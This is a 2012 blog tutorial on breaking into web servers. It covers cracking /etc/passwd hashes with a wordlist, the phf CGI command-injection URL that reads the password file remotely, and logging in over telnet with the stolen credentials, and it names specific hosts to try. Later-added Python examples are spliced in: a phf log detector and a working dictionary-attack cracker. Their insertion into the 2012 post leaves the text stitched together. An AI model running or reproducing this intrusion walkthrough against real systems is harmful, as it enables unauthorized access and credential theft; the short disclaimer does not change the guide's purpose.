Tuesday 21 February 2012

web server hacking

Is there any way to hack an internet server? This question comes up for every newbie hacker, and my answer is yes. There are many ways to break into a web server; this article walks through a few of the classic ones. Since this is slightly higher-level material, I assume everyone reading it already knows roughly how a web server works and has a basic grasp of UNIX commands. I will cover only the high-level steps that many of you may not know, split into parts to make them easier to follow.


Part 1: UNIX commands
DOS commands and UNIX commands are very similar. Below are the basic UNIX commands you will need once you have a shell account, with their DOS equivalents. Note that UNIX commands are lowercase and case-sensitive.
man = HELP (there is no help command as such; man <command> shows the manual page)
cp = COPY
mv = MOVE
ls = DIR
rm = DEL
cd = CD
To see who else is logged on, type who. To get information about a specific user, type finger <username>. With these basic commands you can learn most of what you need to know about the system you are on.

Part 2: Cracking passwords
On a UNIX system the file containing account information is /etc/passwd (forward slash, not the DOS backslash). Simply reaching /etc/passwd does not make you a hacker, because the passwords in it are not stored in the clear: each one is stored as a crypt(3) hash. A hash is one-way, so there is no decryption step to perform, however much you know about decryption. The only way to recover a password is to guess candidates, hash each one with the entry's salt (the first two characters of the hash field) and compare the result with what is in the file. That is exactly what a cracking program does, and the one I suggest is "Cracker Jack". You can get this program from the link given below:
Next you need a wordlist. Browse the link below and download the top-most file: dic-0294.tar.Z
It is a compressed tar archive, so uncompress it before use (uncompress the .Z file, then extract with tar -xf; GNU tar does both with tar -xZf). Put the resulting wordlist in the same directory as the cracking program. The bigger and better targeted the wordlist, the more passwords fall; a dictionary attack can only find passwords that are in the list. You can also search for a tutorial on how to use Cracker Jack.

Part 3: Finding password files
The most important and most difficult part of hacking a server is getting hold of the password file. A system that stores passwords is obviously not going to hand the file to you, so there are two ways to get the job done. The first is simple: on some systems the /etc directory is not blocked from anonymous FTP, so you can fetch /etc/passwd directly and run Cracker Jack on it. If that is restricted, try the second way. Some systems have a CGI program called phf in the /cgi-bin directory; if it is there, you are lucky, because the phf bug lets you read files (and run commands) remotely over the World Wide Web.
For this method go to the URL bar and type: http://yourserver/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Why this works: %0a is a URL-encoded newline and %20 a URL-encoded space. phf passed the Qalias value to a shell and its escaping routine failed to strip the newline character, so everything after the %0a runs as a separate shell command, here cat /etc/passwd, and the command's output comes back in the HTTP response. Two caveats: the command runs as the web server's user, so it can only read what that user can read, and a request to /cgi-bin/phf with a %0a in the query string is such a distinctive fingerprint that any server with logs will record it.
For a hint, you can try www.spawn.com or www.garply.com
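To make the encoding concrete, here is an added example (my own illustration for this article, not code from the original post and not part of phf): it decodes the request above to show the alias field and the injected command the server would run, and flags the same pattern in a few constructed Apache-style access-log lines. The host www.spawn.com in the sample URL is just the one named above; the log lines are made up for the example.

```python
"""Decode the phf request above and flag the same pattern in web logs.

Added example for this article: it is not code from the original post and
not part of phf itself. The log lines below are constructed for the example.
"""
from urllib.parse import parse_qs, urlsplit


def decode_phf_query(url_or_path):
    """Return (alias, injected_command) for a phf URL or request path.

    phf handed the Qalias value to a shell via popen() and its
    escape_shell_cmd() did not strip the newline character (0x0a), so
    whatever followed an encoded %0a ran as a separate shell command.
    parse_qs() URL-decodes %0a to "\\n" and %20 to a space for us.
    """
    params = parse_qs(urlsplit(url_or_path).query, keep_blank_values=True)
    raw = params.get("Qalias", [""])[0]
    alias, _sep, injected = raw.partition("\n")
    return alias, injected.strip()


def is_phf_injection(log_line):
    """True if an Apache-style common/combined log line carries a phf
    request whose Qalias contains a newline, i.e. the injection shape
    shown in the text. A plain phf lookup (no newline) is left alone."""
    parts = log_line.split('"')
    if len(parts) < 2:
        return False
    request = parts[1].split()   # e.g. ['GET', '/cgi-bin/phf?...', 'HTTP/1.0']
    if len(request) < 2 or "/cgi-bin/phf" not in request[1]:
        return False
    _alias, injected = decode_phf_query(request[1])
    return injected != ""


# Constructed log lines for the example (not from any real server).
SAMPLE_LOG = [
    '10.0.0.5 - - [21/Feb/2012:10:01:02 +0000] "GET /index.html HTTP/1.0" 200 512',
    '10.0.0.9 - - [21/Feb/2012:10:01:07 +0000] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 1843',
    '10.0.0.9 - - [21/Feb/2012:10:01:20 +0000] "GET /cgi-bin/phf?Qalias=smith HTTP/1.0" 200 221',
]


def flagged_lines(lines):
    """Return the subset of log lines that look like phf command injection."""
    return [line for line in lines if is_phf_injection(line)]


if __name__ == "__main__":
    alias, cmd = decode_phf_query(
        "http://www.spawn.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd")
    print("alias field:", repr(alias))
    print("command the server would run:", repr(cmd))
    for line in flagged_lines(SAMPLE_LOG):
        print("ALERT:", line)
```

Run on the sample, the decoder reports alias `x` and command `/bin/cat /etc/passwd`, and only the second log line is flagged: the third is a normal phone-book lookup. From the defender's side, a 200 on /cgi-bin/phf tells you the program is installed at all, which on its own is reason to remove it.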
If both of the preceding methods fail, try any other way you can think of to get the file. If you do get it and every entry's second field is x, ! or *, the password file is shadowed. Shadowing is a method of adding extra security: the hashes are moved out of the world-readable /etc/passwd into /etc/shadow, which only root can read, precisely to keep crackers and other unwanted people from using them. There is no way to "unshadow" a password file from /etc/passwd alone; you need /etc/shadow itself, which means root access or some other read primitive (the phf trick above runs as the web server's user, which normally cannot read it). Sometimes, however, administrators leave backup copies of the old, unshadowed file lying around, so look for those. If you obtain both files, John the Ripper's unshadow utility merges them back into the single format crackers expect.
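The following added example (my own illustration for Parts 2 and 3, not code from the original post and not Cracker Jack) ties the two parts together: it parses a passwd-style file, separates the shadowed entries that cannot be attacked from the ones that can, and runs a wordlist attack on the latter. One assumption to be clear about: crypt(3)'s DES hash is replaced by an illustrative stand-in (two-character salt followed by SHA-256 of salt+password) so the script runs on any current Python without the removed `crypt` module. The sample file and wordlist are constructed for the example.

```python
"""Parse a passwd-style file, detect shadowed entries and run a wordlist
attack against the rest.

Added example for this article; it is not code from the original post and
not Cracker Jack. Assumption: crypt(3)'s DES hash is replaced here by an
illustrative stand-in (two-character salt followed by SHA-256 of
salt+password) so the script runs on any Python without the removed
`crypt` module. The attack loop is the same one Cracker Jack performs:
take the salt from the entry, hash each candidate word with it, compare.
"""
import hashlib

SALT_LEN = 2  # crypt(3) DES uses a two-character salt; the stand-in copies that


def hash_password(salt, password):
    """Stand-in for crypt(3): salt prefix + hex SHA-256 of salt||password."""
    digest = hashlib.sha256((salt + password).encode()).hexdigest()
    return salt + digest


def parse_passwd(text):
    """Parse user:hash:uid:gid:gecos:home:shell lines into dicts."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # skip malformed lines rather than crash on them
        entries.append({"user": fields[0], "hash": fields[1],
                        "uid": fields[2], "shell": fields[6]})
    return entries


def is_shadowed(hash_field):
    """A second field of x, ! or * means the real hash lives in /etc/shadow
    (or the account is locked / has no usable password)."""
    return hash_field == "x" or hash_field.startswith(("!", "*"))


def shadowed_users(entries):
    """Users whose entries carry no crackable hash."""
    return [e["user"] for e in entries if is_shadowed(e["hash"])]


def crack(entries, wordlist):
    """Dictionary attack: returns {user: password} for every entry whose
    hash matches some word in the list. Shadowed entries are skipped,
    since there is nothing to attack in them."""
    found = {}
    for entry in entries:
        if is_shadowed(entry["hash"]):
            continue
        salt = entry["hash"][:SALT_LEN]
        for word in wordlist:
            if hash_password(salt, word) == entry["hash"]:
                found[entry["user"]] = word
                break
    return found


# Constructed sample file; the hashes are generated with the stand-in above.
SAMPLE_PASSWD = "\n".join([
    "root:" + hash_password("k9", "sunshine") + ":0:0:root:/root:/bin/sh",
    "www:" + hash_password("Qz", "tr0ub4dor&3") + ":80:80:Web Server:/var/www:/bin/false",
    "alice:x:1000:1000:Alice:/home/alice:/bin/bash",
    "ftp:*:14:50:FTP User:/var/ftp:/sbin/nologin",
])

# A tiny constructed wordlist. A real one such as the extracted dic-0294
# file would be loaded with open(path, encoding="latin-1").read().split().
WORDLIST = ["password", "123456", "sunshine", "letmein", "secret"]


if __name__ == "__main__":
    entries = parse_passwd(SAMPLE_PASSWD)
    print("shadowed (nothing to crack):", shadowed_users(entries))
    print("cracked:", crack(entries, WORDLIST))
```

On the sample, alice and ftp are reported as shadowed, root falls to the wordlist ("sunshine"), and www survives because its password is not in the list; that last case is the whole reason wordlist quality matters in Part 2.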


Part 4: Logging into a new shell
Run your telnet client and connect to the server whose passwords you cracked, for example www.spawn.com. Once connected you will see a login prompt asking for a username and password; enter the information you gathered in Parts 2 and 3 and you have a shell. Two things to keep in mind: telnet sends everything, including the password, in clear text, and a successful login is recorded in the system's login records (the same data who and last read), so it is not invisible. Don't use this tutorial for spreading viruses or harming others; this article is strictly for education and knowledge purposes only.